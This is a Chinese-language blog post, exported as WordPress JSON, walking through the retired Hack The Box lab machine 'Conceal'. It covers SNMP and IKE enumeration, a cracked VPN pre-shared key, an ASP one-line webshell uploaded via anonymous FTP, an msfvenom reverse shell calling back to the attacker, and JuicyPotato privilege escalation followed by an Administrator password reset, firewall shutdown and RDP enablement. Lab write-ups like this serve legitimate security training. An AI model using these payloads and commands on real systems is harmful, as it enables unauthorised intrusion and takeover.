{"id":185,"date":"2024-11-13T10:58:50","date_gmt":"2024-11-13T02:58:50","guid":{"rendered":"https:\/\/www.misaka19008-lab.icu\/?p=185"},"modified":"2024-11-13T10:58:51","modified_gmt":"2024-11-13T02:58:51","slug":"185","status":"publish","type":"post","link":"https:\/\/www.misaka19008-lab.icu\/index.php\/2024\/11\/13\/185\/","title":{"rendered":"HTB\u9776\u673a Conceal \u6e17\u900f\u6d4b\u8bd5\u8bb0\u5f55"},"content":{"rendered":"<hr \/>\n<h1>\u76ee\u6807\u4fe1\u606f<\/h1>\n<blockquote><p><strong>IP\u5730\u5740\uff1a<\/strong><code>10.10.10.116<\/code><\/p><\/blockquote>\n<hr \/>\n<h1>\u4fe1\u606f\u6536\u96c6<\/h1>\n<h2>ICMP\u68c0\u6d4b<\/h2>\n<pre><code class=\"language-plain\">PING 10.10.10.116 (10.10.10.116) 56(84) bytes of data.\n64 bytes from 10.10.10.116: icmp_seq=1 ttl=127 time=130 ms\n64 bytes from 10.10.10.116: icmp_seq=2 ttl=127 time=195 ms\n64 bytes from 10.10.10.116: icmp_seq=3 ttl=127 time=111 ms\n64 bytes from 10.10.10.116: icmp_seq=4 ttl=127 time=259 ms\n\n--- 10.10.10.116 ping statistics ---\n4 packets transmitted, 4 received, 0% packet loss, time 3284ms\nrtt min\/avg\/max\/mdev = 110.539\/173.664\/259.289\/58.446 ms<\/code><\/pre>\n<p>\u653b\u51fb\u673a\u548c\u9776\u673a\u4e4b\u95f4\u901a\u4fe1\u72b6\u6001\u826f\u597d\u3002<\/p>\n<h2>\u9632\u706b\u5899\u68c0\u6d4b<\/h2>\n<pre><code class=\"language-plain\"># Nmap 7.94SVN scan initiated Thu Oct 10 11:09:41 2024 as: nmap -sF -p- --min-rate 2000 -oN .\/fin_result.txt 10.10.10.116\nNmap scan report for 10.10.10.116\nHost is up (0.11s latency).\nAll 65535 scanned ports on 10.10.10.116 are in ignored states.\nNot shown: 65535 open|filtered tcp ports (no-response)\n\n# Nmap done at Thu Oct 10 11:10:48 2024 -- 1 IP address (1 host up) scanned in 66.80 seconds<\/code><\/pre>\n<p>\u65e0\u6cd5\u786e\u5b9a\u9776\u673a\u9632\u706b\u5899\u72b6\u6001\u3002<\/p>\n<h2>\u7f51\u7edc\u7aef\u53e3\u626b\u63cf<\/h2>\n<p><code>TCP<\/code><strong>\u7aef\u53e3\u626b\u63cf\u7ed3\u679c<\/strong><\/p>\n<pre><code class=\"language-plain\"># Nmap 7.94SVN scan initiated Thu Oct 10 11:30:48 2024 as: nmap -sT -sV -A -p- --min-rate 2000 -oN .\/tcp_report.txt 10.10.10.116\nNmap scan report for 10.10.10.116\nHost is up (0.061s latency).\nNot shown: 65534 filtered tcp ports (no-response)\nPORT   STATE SERVICE    VERSION\n53\/tcp open  tcpwrapped\nWarning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port\nOS fingerprint not ideal because: Missing a closed TCP port so results incomplete\nNo OS matches for host\nNetwork Distance: 2 hops\n\nTRACEROUTE (using proto 1\/icmp)\nHOP RTT       ADDRESS\n1   108.98 ms 10.10.14.1\n2   109.29 ms 10.10.10.116\n\nOS and Service detection performed. Please report any incorrect results at https:\/\/nmap.org\/submit\/ .\n# Nmap done at Thu Oct 10 11:32:06 2024 -- 1 IP address (1 host up) scanned in 78.11 seconds<\/code><\/pre>\n<p><code>UDP<\/code><strong>\u7aef\u53e3\u5f00\u653e\u5217\u8868\u626b\u63cf\u7ed3\u679c<\/strong><\/p>\n<pre><code class=\"language-plain\"># Nmap 7.94SVN scan initiated Thu Oct 10 11:23:30 2024 as: nmap -sU -p- --min-rate 2000 -oN .\/udp_ports.txt 10.10.10.116\nNmap scan report for 10.10.10.116\nHost is up (0.11s latency).\nNot shown: 65533 open|filtered udp ports (no-response)\nPORT    STATE SERVICE\n161\/udp open  snmp\n500\/udp open  isakmp\n\n# Nmap done at Thu Oct 10 11:24:38 2024 -- 1 IP address (1 host up) scanned in 67.19 seconds<\/code><\/pre>\n<p><code>UDP<\/code><strong>\u7aef\u53e3\u8be6\u7ec6\u4fe1\u606f\u626b\u63cf\u7ed3\u679c<\/strong><\/p>\n<pre><code class=\"language-plain\"># Nmap 7.94SVN scan initiated Thu Oct 10 11:25:32 2024 as: nmap -sC -sU -sV -A -p 161,500 -oN .\/udp_result.txt 10.10.10.116\nNmap scan report for 10.10.10.116\nHost is up (0.17s latency).\n\nPORT    STATE SERVICE VERSION\n161\/udp open  snmp    SNMPv1 server (public)\n| snmp-win32-users: \n|   Administrator\n|   DefaultAccount\n|   Destitute\n|_  Guest\n| snmp-netstat: \n|   TCP  0.0.0.0:21           0.0.0.0:0\n|   TCP  0.0.0.0:80           0.0.0.0:0\n|   TCP  0.0.0.0:135          0.0.0.0:0\n|   TCP  0.0.0.0:445          0.0.0.0:0\n|   TCP  0.0.0.0:49664        0.0.0.0:0\n|   TCP  0.0.0.0:49665        0.0.0.0:0\n|   TCP  0.0.0.0:49666        0.0.0.0:0\n|   TCP  0.0.0.0:49667        0.0.0.0:0\n|   TCP  0.0.0.0:49668        0.0.0.0:0\n|   TCP  0.0.0.0:49669        0.0.0.0:0\n|   TCP  0.0.0.0:49670        0.0.0.0:0\n|   TCP  10.10.10.116:139     0.0.0.0:0\n|   UDP  0.0.0.0:123          *:*\n|   UDP  0.0.0.0:161          *:*\n|   UDP  0.0.0.0:500          *:*\n|   UDP  0.0.0.0:4500         *:*\n|   UDP  0.0.0.0:5050         *:*\n|   UDP  0.0.0.0:5353         *:*\n|   UDP  0.0.0.0:5355         *:*\n|   UDP  10.10.10.116:137     *:*\n|   UDP  10.10.10.116:138     *:*\n|   UDP  10.10.10.116:1900    *:*\n|   UDP  10.10.10.116:61146   *:*\n|   UDP  127.0.0.1:1900       *:*\n|_  UDP  127.0.0.1:61147      *:*\n| snmp-interfaces: \n|   Software Loopback Interface 1x00\n|     IP address: 127.0.0.1  Netmask: 255.0.0.0\n|     Type: softwareLoopback  Speed: 1 Gbps\n|     Traffic stats: 0.00 Kb sent, 0.00 Kb received\n|   vmxnet3 Ethernet Adapterx00\n|     IP address: 10.10.10.116  Netmask: 255.255.255.0\n|     MAC address: 00:50:56:b9:4a:3a (VMware)\n|     Type: ethernetCsmacd  Speed: 4 Gbps\n|   vmxnet3 Ethernet Adapter-WFP Native MAC Layer LightWeight Filter-0000x00\n|     MAC address: 00:50:56:b9:4a:3a (VMware)\n|     Type: ethernetCsmacd  Speed: 4 Gbps\n|   vmxnet3 Ethernet Adapter-QoS Packet Scheduler-0000x00\n|     MAC address: 00:50:56:b9:4a:3a (VMware)\n|     Type: ethernetCsmacd  Speed: 4 Gbps\n|   vmxnet3 Ethernet Adapter-WFP 802.3 MAC Layer LightWeight Filter-0000x00\n|     MAC address: 00:50:56:b9:4a:3a (VMware)\n|_    Type: ethernetCsmacd  Speed: 4 Gbps\n| snmp-processes: \n|   1: \n|     Name: System Idle Process\n|   4: \n|     Name: System\n|   280: \n|     Name: svchost.exe\n|     Path: C:WindowsSystem32\n|     Params: -k LocalSystemNetworkRestricted\n|   300: \n|     Name: smss.exe\n|   ......\n|   3552: \n|     Name: SearchIndexer.exe\n|     Path: C:Windowssystem32\n|     Params: \/Embedding\n|   4324: \n|     Name: SearchFilterHost.exe\n|     Path: C:Windowssystem32\n|_    Params:  0 700 704 712 8192 708 \n| snmp-win32-software: \n|   Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161; 2021-03-17T15:16:36\n|   Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161; 2021-03-17T15:16:36\n|_  VMware Tools; 2021-03-17T15:16:36\n| snmp-sysdescr: Hardware: AMD64 Family 25 Model 1 Stepping 1 AT\/AT COMPATIBLE - Software: Windows Version 6.3 (Build 15063 Multiprocessor Free)\n|_  System uptime: 29m37.43s (177743 timeticks)\n| snmp-win32-services: \n|   Application Host Helper Service\n|   Background Intelligent Transfer Service\n|   Background Tasks Infrastructure Service\n|   Base Filtering Engine\n|   ......\n|   Windows Time\n|   Workstation\n|_  World Wide Web Publishing Service\n500\/udp open  isakmp  Microsoft Windows 8\n| fingerprint-strings: \n|   IKE_MAIN_MODE: \n|     \"3DUfw\n|_    XEW(\n| ike-version: \n|   vendor_id: Microsoft Windows 8\n|   attributes: \n|     MS NT5 ISAKMPOAKLEY\n|     RFC 3947 NAT-T\n|     draft-ietf-ipsec-nat-t-ike-02n\n|     IKE FRAGMENTATION\n|     MS-Negotiation Discovery Capable\n|_    IKE CGA version 1\nWarning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port\nDevice type: specialized|VoIP phone|general purpose|phone\nRunning: Allen-Bradley embedded, Atcom embedded, Microsoft Windows 7|8|Phone|XP|2012, Palmmicro embedded, VMware Player\nOS CPE: cpe:\/h:allen-bradley:micrologix_1100 cpe:\/h:atcom:at-320 cpe:\/o:microsoft:windows_7 cpe:\/o:microsoft:windows_8 cpe:\/o:microsoft:windows cpe:\/o:microsoft:windows_xp::sp3 cpe:\/o:microsoft:windows_server_2012 cpe:\/a:vmware:player\nOS details: Allen Bradley MicroLogix 1100 PLC, Atcom AT-320 VoIP phone, Microsoft Windows Embedded Standard 7, Microsoft Windows 8.1 Update 1, Microsoft Windows Phone 7.5 or 8.0, Microsoft Windows XP SP3 or Windows 7 or Windows Server 2012, Palmmicro AR1688 VoIP module, VMware Player virtual NAT device\nNetwork Distance: 2 hops\nService Info: Host: Conceal; OS: Windows 8; CPE: cpe:\/o:microsoft:windows:8, cpe:\/o:microsoft:windows\n\nTRACEROUTE (using port 161\/udp)\nHOP RTT       ADDRESS\n1   266.83 ms 10.10.14.1\n2   267.64 ms 10.10.10.116\n\nOS and Service detection performed. Please report any incorrect results at https:\/\/nmap.org\/submit\/ .\n# Nmap done at Thu Oct 10 11:28:30 2024 -- 1 IP address (1 host up) scanned in 178.15 seconds<\/code><\/pre>\n<p><code>TCP<\/code><strong>\u7aef\u53e3\u4e8c\u6b21\u626b\u63cf\u7ed3\u679c\uff08\u4f7f\u7528<\/strong><code>VPN<\/code><strong>\u96a7\u9053\uff09<\/strong><\/p>\n<pre><code class=\"language-plain\"># Nmap 7.94SVN scan initiated Wed Oct 16 09:31:15 2024 as: nmap -sT -sV -A -p- --min-rate 4000 -oN .\/tcp_report_vpn.txt 10.10.10.116\nWarning: 10.10.10.116 giving up on port because retransmission cap hit (10).\nNmap scan report for 10.10.10.116\nHost is up (0.093s latency).\nNot shown: 65458 closed tcp ports (conn-refused), 64 filtered tcp ports (no-response)\nPORT      STATE SERVICE       VERSION\n21\/tcp    open  ftp           Microsoft ftpd\n| ftp-syst: \n|_  SYST: Windows_NT\n|_ftp-anon: Anonymous FTP login allowed (FTP code 230)\n53\/tcp    open  tcpwrapped\n80\/tcp    open  http          Microsoft IIS httpd 10.0\n|_http-server-header: Microsoft-IIS\/10.0\n| http-methods: \n|_  Potentially risky methods: TRACE\n|_http-title: IIS Windows\n135\/tcp   open  msrpc         Microsoft Windows RPC\n139\/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn\n445\/tcp   open  microsoft-ds?\n49664\/tcp open  msrpc         Microsoft Windows RPC\n49665\/tcp open  msrpc         Microsoft Windows RPC\n49666\/tcp open  msrpc         Microsoft Windows RPC\n49667\/tcp open  msrpc         Microsoft Windows RPC\n49668\/tcp open  msrpc         Microsoft Windows RPC\n49669\/tcp open  msrpc         Microsoft Windows RPC\n49670\/tcp open  msrpc         Microsoft Windows RPC\nOS fingerprint not ideal because: Didn't receive UDP response. Please try again with -sSU\nNo OS matches for host\nNetwork Distance: 2 hops\nService Info: OS: Windows; CPE: cpe:\/o:microsoft:windows\n\nHost script results:\n|_clock-skew: -11m50s\n| smb2-security-mode: \n|   3:1:1: \n|_    Message signing enabled but not required\n| smb2-time: \n|   date: 2024-10-16T01:21:04\n|_  start_date: 2024-10-15T23:54:32\n\nTRACEROUTE (using proto 1\/icmp)\nHOP RTT      ADDRESS\n1   93.32 ms 10.10.14.1\n2   93.62 ms 10.10.10.116\n\nOS and Service detection performed. Please report any incorrect results at https:\/\/nmap.org\/submit\/ .\n# Nmap done at Wed Oct 16 09:33:00 2024 -- 1 IP address (1 host up) scanned in 105.25 seconds<\/code><\/pre>\n<p>\u540c\u65f6\u53d1\u73b0\u9776\u673a\u64cd\u4f5c\u7cfb\u7edf\u7591\u4f3c\u4e3a<code>Windows 8<\/code>\uff0c\u5e76\u8fc7\u6ee4\u4e86\u5927\u90e8\u5206\u7aef\u53e3\uff0c\u9700\u8981\u8fde\u63a5<code>IPSec VPN<\/code>\u3002<\/p>\n<hr \/>\n<h1>\u670d\u52a1\u63a2\u6d4b<\/h1>\n<h2>SNMP\u670d\u52a1\uff08161\u7aef\u53e3\uff09<\/h2>\n<p>\u76f4\u63a5\u4f7f\u7528<code>public<\/code>\u56e2\u4f53\u540d\u8fde\u63a5\u670d\u52a1\uff1a<\/p>\n<pre><code class=\"language-shell\">snmpwalk -v2c -c public 10.10.10.116 | grep \"STRING\"<\/code><\/pre>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2024\/png\/42816956\/1729038081979-7cdfd681-2e08-4e6c-bda8-e94e04af1b10.png\" alt=\"\" \/><\/p>\n<p>\u53d1\u73b0\u4e86\u4e00\u6761\u5173\u4e8e<code>IKE VPN<\/code>\u9884\u8ba4\u8bc1\u5bc6\u94a5\u7684\u63d0\u793a\uff1a<code>9C8B1A372B1878851BE2C097031B6E43<\/code>\uff0c\u5c1d\u8bd5\u4f7f\u7528\u5728\u7ebf\u5de5\u5177\u7834\u89e3\uff1a<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2024\/png\/42816956\/1729038227209-c26000a1-b7f3-4991-92df-527486ae0710.png\" alt=\"\" \/><\/p>\n<p>\u6210\u529f\u53d1\u73b0\u9884\u8ba4\u8bc1\u5bc6\u94a5\u4e3a<code>Dudecake1!<\/code>\u3002<\/p>\n<h2>IKE VPN\u670d\u52a1\uff08500\u7aef\u53e3\uff09<\/h2>\n<p>\u4f7f\u7528<code>ike-scan<\/code>\u5de5\u5177\u786e\u5b9a\u76ee\u6807<code>VPN<\/code>\u670d\u52a1\u4f7f\u7528\u7684\u8ba4\u8bc1\u7b97\u6cd5\u3001\u8fde\u63a5\u7c7b\u578b\u7b49\u4fe1\u606f\uff1a<\/p>\n<pre><code class=\"language-shell\">ike-scan -M 10.10.10.116<\/code><\/pre>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2024\/png\/42816956\/1729038603350-da58adb5-7dc3-4665-aa84-8d13da78192b.png\" alt=\"\" \/><\/p>\n<p>\u53d1\u73b0\u9776\u673a<code>VPN<\/code>\u670d\u52a1\u4f7f\u7528<code>PSK<\/code>\u9884\u8ba4\u8bc1\u5bc6\u94a5\uff0c<code>IKE<\/code>\u7b97\u6cd5\u4e3a<code>3des-sha1-modp1024<\/code>\uff0c<code>ESP<\/code>\u7b97\u6cd5\u4e3a<code>3des-sha1<\/code>\uff0c\u51b3\u5b9a\u4f7f\u7528<code>StrongSwan<\/code>\u8fde\u63a5\uff0c\u8fde\u63a5\u6a21\u5f0f\u4f7f\u7528<code>transport<\/code>\u3002\u76f4\u63a5\u4fee\u6539<code>ipsec.conf<\/code>\u6587\u4ef6\uff1a<\/p>\n<pre><code class=\"language-shell\"># nano \/etc\/ipsec.conf\nconfig setup\n         strictcrlpolicy=yes\n         uniqueids = no\n         charondebug = \"all\"\n\nconn htb_Conceal\n          authby = secret\n          auto = add\n          keyexchange = ikev1\n          ike = 3des-sha1-modp1024\n          left = 10.10.14.2\n          right = 10.10.10.116\n          type = transport\n          esp = 3des-sha1\n          rightprotoport = tcp<\/code><\/pre>\n<p>\u968f\u540e\u7f16\u8f91<code>ipsec.secrets<\/code>\uff0c\u6dfb\u52a0<code>PSK<\/code>\u9884\u8ba4\u8bc1\u5bc6\u94a5\uff1a<\/p>\n<pre><code class=\"language-shell\"># nano \/etc\/ipsec.secrets\n10.10.14.2 10.10.10.116 : PSK \"Dudecake1!\"<\/code><\/pre>\n<p>\u968f\u540e\u91cd\u65b0\u8f7d\u5165<code>IPSec<\/code>\u914d\u7f6e\uff0c\u5e76\u542f\u52a8<code>htb_Conceal<\/code>\u8fde\u63a5\uff1a<\/p>\n<pre><code class=\"language-shell\">ipsec restart\nipsec up htb_Conceal<\/code><\/pre>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2024\/png\/42816956\/1729041707098-ca0312e8-faf4-4b6c-af5f-e0c14080dc15.png\" alt=\"\" \/><\/p>\n<p>\u8fde\u63a5\u6210\u529f\uff01\uff01\u968f\u540e\u91cd\u65b0\u4f7f\u7528<code>Nmap<\/code>\u5bf9<code>TCP<\/code>\u7aef\u53e3\u8fdb\u884c\u626b\u63cf\u3002<\/p>\n<h2>FTP\u670d\u52a1\uff0821\u7aef\u53e3\uff09<\/h2>\n<p>\u6839\u636e<code>Nmap<\/code>\u7684\u626b\u63cf\u62a5\u544a\uff0c\u53d1\u73b0\u9776\u673a<code>FTP<\/code>\u670d\u52a1\u5141\u8bb8\u533f\u540d\u767b\u5f55\uff1a<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2024\/png\/42816956\/1729043204139-596535fa-8910-477e-a9de-accc8a536e62.png\" alt=\"\" \/><\/p>\n<p>\u5c1d\u8bd5\u65b0\u5efa\u6587\u4ef6\uff1a<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2024\/png\/42816956\/1729043285620-2da6e24c-c97d-4e19-93db-1fc2cc0b1f47.png\" alt=\"\" \/><\/p>\n<p>\u53d1\u73b0\u533f\u540d\u8d26\u6237\u62e5\u6709\u5199\u5165\u6743\u9650\uff01<\/p>\n<h2>Web\u5e94\u7528\u7a0b\u5e8f\uff0880\u7aef\u53e3\uff09<\/h2>\n<p>\u6253\u5f00\u4e3b\u9875\uff1a<code>http:\/\/conceal.htb\/<\/code><\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2024\/png\/42816956\/1729043797342-47fc96cf-ea1c-4f70-8dc8-8d87092b5003.png\" alt=\"\" \/><\/p>\n<p>\u53d1\u73b0\u9ed8\u8ba4\u9875\u9762\uff0c\u76f4\u63a5\u626b\u63cf\u76ee\u5f55\uff1a<\/p>\n<pre><code class=\"language-plain\"># Dirsearch started Wed Oct 16 10:00:54 2024 as: \/usr\/lib\/python3\/dist-packages\/dirsearch\/dirsearch.py -u http:\/\/conceal.htb\/ -x 400,403,404 -t 60 -e asp,aspx,php,js,html,txt,zip,tar.gz,pcap\n\n301   149B   http:\/\/conceal.htb\/Upload    -&gt; REDIRECTS TO: http:\/\/conceal.htb\/Upload\/\n301   149B   http:\/\/conceal.htb\/upload    -&gt; REDIRECTS TO: http:\/\/conceal.htb\/upload\/\n200   175B   http:\/\/conceal.htb\/upload\/<\/code><\/pre>\n<p>\u6210\u529f\u53d1\u73b0\u76ee\u5f55<code>\/upload<\/code>\uff1a<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2024\/png\/42816956\/1729045896213-834f45a4-de46-43ec-8aae-8b17a24ba88a.png\" alt=\"\" \/><\/p>\n<p>\u8054\u60f3\u5230\u4e4b\u524d\u53d1\u73b0<code>FTP<\/code>\u670d\u52a1\u53ef\u5199\u7684\u60c5\u51b5\uff0c\u6000\u7591\u6b64\u5904\u5c31\u662f<code>FTP<\/code>\u670d\u52a1\u7684\u5de5\u4f5c\u76ee\u5f55\u3002\u5c1d\u8bd5\u65b0\u5efa<code>test.html<\/code>\uff1a<\/p>\n<pre><code class=\"language-html\">&lt;h1&gt;Success!&lt;\/h1&gt;<\/code><\/pre>\n<p>\u7136\u540e\u5c06\u5176\u901a\u8fc7<code>FTP<\/code>\u670d\u52a1\u4e0a\u4f20\uff0c\u968f\u540e\u8bbf\u95ee<code>http:\/\/conceal.htb\/upload\/test.html<\/code>\uff1a<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2024\/png\/42816956\/1729046053106-6aaebe4e-34fc-466d-9eec-692a9e2048db.png\" alt=\"\" \/><\/p>\n<p><strong>\u6210\u529f\uff01\uff01\u76f4\u63a5\u4e0a\u4f20WebShell\u5373\u53ef\u3002<\/strong><\/p>\n<hr \/>\n<h1>\u6e17\u900f\u6d4b\u8bd5<\/h1>\n<p>\u76f4\u63a5\u4e0a\u4f20\u5982\u4e0b<code>ASP<\/code>\u4e00\u53e5\u8bdd\u6728\u9a6c\uff1a<\/p>\n<pre><code class=\"language-shell\">&lt;%execute(request(\"cmd\"))%&gt;<\/code><\/pre>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2024\/png\/42816956\/1729047420275-e72b175c-724c-41ef-8773-f98565f65258.png\" alt=\"\" \/><\/p>\n<p>\u968f\u540e\u4f7f\u7528\u8681\u5251\u8fde\u63a5\uff1a<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2024\/png\/42816956\/1729047492745-15c83903-8166-47fd-9aae-7b9d361c056f.png\" alt=\"\" \/><\/p>\n<p>\u63a5\u7740\u706b\u901f\u5728<code>C:\\inetpub\\wwwroot<\/code>\u7f51\u7ad9\u6839\u76ee\u5f55\u4e0b\u65b0\u5efa\u6301\u4e45\u5316<code>WebShell<\/code>\uff0c\u5e76\u4fee\u6539\u8681\u5251\u8fde\u63a5\u914d\u7f6e\uff1a<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2024\/png\/42816956\/1729047660188-59f86c3b-f27e-4678-a4ff-9129fe4d3ee3.png\" alt=\"\" \/><\/p>\n<p>\u6210\u529f\u5efa\u7acb\u6301\u4e45\u5316\u7f51\u9875\u540e\u95e8\u4e4b\u540e\uff0c\u5728\u672c\u5730\u4f7f\u7528<code>msfvenom<\/code>\u751f\u6210\u53cd\u5f39Shell\u6728\u9a6c\uff1a<\/p>\n<pre><code class=\"language-shell\">msfvenom -p windows\/x64\/powershell_reverse_tcp_ssl LHOST=10.10.14.2 LPORT=443 -f exe -o reverse443.exe<\/code><\/pre>\n<p>\u7136\u540e\u4f7f\u7528\u8681\u5251\u4e0a\u4f20\uff0c\u5728\u672c\u5730\u6253\u5f00<code>Metasploit<\/code>\u76d1\u542c\uff0c\u5e76\u901a\u8fc7\u8681\u5251\u865a\u62df\u7ec8\u7aef\u6267\u884c\u5982\u4e0b\u547d\u4ee4\uff1a<\/p>\n<pre><code class=\"language-shell\">.reverse443.exe<\/code><\/pre>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2024\/png\/42816956\/1729048183986-28ab0ead-eeaf-47e8-8b5f-623ea2d4b1a7.png\" alt=\"\" \/><\/p>\n<p><strong>\u53cd\u5f39Shell\u6210\u529f\uff01\uff01\uff01<\/strong><\/p>\n<hr \/>\n<h1>\u6743\u9650\u63d0\u5347<\/h1>\n<h2>\u5185\u6838\u6f0f\u6d1e\u67e5\u8be2<\/h2>\n<p>\u4f7f\u7528\u5982\u4e0b\u547d\u4ee4\u65b0\u5efa<code>SMB<\/code>\u8fde\u63a5\uff0c\u5e76\u5c06<code>systeminfo<\/code>\u547d\u4ee4\u7ed3\u679c\u4fdd\u5b58\u5230\u672c\u5730\uff1a<\/p>\n<pre><code class=\"language-powershell\">net use Z: \\\\10.10.14.2\\pentest_notes\\conceal ********* \/user:megumin\nsysteminfo &gt; Z:\\sysinfo.txt<\/code><\/pre>\n<p>\u968f\u540e\u4f7f\u7528<code>Windows Exploit Suggetser 2<\/code>\u8fdb\u884c\u6f0f\u6d1e\u67e5\u8be2\uff1a<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2024\/png\/42816956\/1729050468924-a5593406-7741-43c7-b512-90e55bb04e47.png\" alt=\"\" \/><\/p>\n<p>\u51b3\u5b9a\u4f7f\u7528<code>MS16-075<\/code>\uff08\u70c2\u571f\u8c46\uff09\u6f0f\u6d1e\u63d0\u6743\u3002<\/p>\n<h2>MS16-075\u6f0f\u6d1e\u5229\u7528<\/h2>\n<p>\u76f4\u63a5\u4f7f\u7528<code>JuicyPotato<\/code>\u5de5\u5177\u8fdb\u884c\u4ee4\u724c\u7a83\u53d6\u548c\u547d\u4ee4\u6267\u884c\u3002\u4e0b\u8f7d\u5730\u5740\uff1a<a href=\"https:\/\/raw.githubusercontent.com\/uknowsec\/JuicyPotato\/refs\/heads\/main\/JuicyPotato-webshell\/Bin\/JuicyPotato_x64.exe\" target=\"_blank\"  rel=\"nofollow\" >JuicyPotato\/JuicyPotato-webshell\/Bin\/JuicyPotato_x64.exe at main \u00b7 uknowsec\/JuicyPotato \u00b7 GitHub<\/a><\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2024\/png\/42816956\/1729051518656-416560a4-3df7-4328-ae59-a677e9c394d7.png\" alt=\"\" \/><\/p>\n<p>\u4f7f\u7528\u5982\u4e0b\u547d\u4ee4\u4e0a\u4f20\u5229\u7528\u7a0b\u5e8f\uff1a<\/p>\n<pre><code class=\"language-powershell\">copy Z:\\JuicyPotato_x64.exe .\\JuicyPotato_x64.exe<\/code><\/pre>\n<p>\u5728\u6267\u884c\u5229\u7528\u7a0b\u5e8f\u524d\uff0c\u9996\u5148\u9700\u8981\u83b7\u53d6\u4e00\u4e2a\u53ef\u7528\u7684<code>CLSID<\/code>\u3002\u6211\u4eec\u6253\u5f00\u5728\u7ebf<code>CLSID<\/code>\u5217\u8868\u8fdb\u884c\u9009\u62e9\uff1a<a href=\"https:\/\/github.com\/ohpe\/juicy-potato\/tree\/master\/CLSID\/Windows_10_Enterprise\" target=\"_blank\"  rel=\"nofollow\" >juicy-potato\/CLSID\/Windows_10_Enterprise at master \u00b7 ohpe\/juicy-potato \u00b7 GitHub<\/a><\/p>\n<p>\u8fd9\u91cc\u5c1d\u8bd5\u4f7f\u7528<code>winmgmt<\/code>\u670d\u52a1\u7684<code>CLSID<\/code>\u8fdb\u884c\u4ee4\u724c\u7a83\u53d6\uff1a<\/p>\n<pre><code class=\"language-powershell\">.\\JuicyPotato_x64.exe -c \"{8BC3F05E-D86B-11D0-A075-00C04FB68820}\" -a \"whoami\"<\/code><\/pre>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2024\/png\/42816956\/1729052783961-b62eb5df-a450-4dba-a095-f72e97521ba8.png\" alt=\"\" \/><\/p>\n<p><strong>\u63d0\u6743\u6210\u529f\uff01\uff01\uff01\uff01\u63a5\u4e0b\u6765\u76f4\u63a5\u4fee\u6539<\/strong><code>**Administrator**<\/code><strong>\u5bc6\u7801\u3001\u5173\u95ed\u9632\u706b\u5899\u5e76\u6253\u5f00<\/strong><code>**RDP**<\/code><strong>\u670d\u52a1\uff1a<\/strong><\/p>\n<pre><code class=\"language-powershell\">.\\JuicyPotato_x64.exe -c \"{8BC3F05E-D86B-11D0-A075-00C04FB68820}\" -a \"net user Administrator *********\"\n.\\JuicyPotato_x64.exe -c \"{8BC3F05E-D86B-11D0-A075-00C04FB68820}\" -a \"netsh advfirewall set allprofiles state off\"\n.\\JuicyPotato_x64.exe -c \"{8BC3F05E-D86B-11D0-A075-00C04FB68820}\" -a \"wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1\"<\/code><\/pre>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2024\/png\/42816956\/1729054065114-cdcc1009-98cb-4fe3-949c-d3a920308f93.png\" alt=\"\" \/><\/p>\n<p>\u968f\u540e\u4f7f\u7528<code>Reminna<\/code>\u5de5\u5177\u76f4\u63a5\u5373\u53ef\u3002<\/p>\n<hr \/>\n<h1>Flag\u6587\u4ef6\u5c55\u793a<\/h1>\n<p><img decoding=\"async\" src=\"https:\/\/cdn.nlark.com\/yuque\/0\/2024\/png\/42816956\/1729054421476-a07be843-9921-47f8-a1d4-72b2873048a7.png\" alt=\"\" \/><\/p>\n<hr \/>\n<h1>\u672c\u6b21\u9776\u673a\u6e17\u900f\u5230\u6b64\u7ed3\u675f<\/h1>\n<hr \/>\n","protected":false},"excerpt":{"rendered":"<p>\u76ee\u6807\u4fe1\u606f IP\u5730\u5740\uff1a10.10.10.116 \u4fe1\u606f\u6536\u96c6 ICMP\u68c0\u6d4b PING 10.10.10.116 (10.10.10.11 &#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_seopress_robots_primary_cat":"","_seopress_titles_title":"","_seopress_titles_desc":"","_seopress_robots_index":"","emotion":"","emotion_color":"","title_style":"","license":"","footnotes":""},"categories":[3,13],"tags":[],"class_list":["post-185","post","type-post","status-publish","format-standard","hentry","category-htb_retired","category-windows_machine"],"_links":{"self":[{"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/posts\/185","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/comments?post=185"}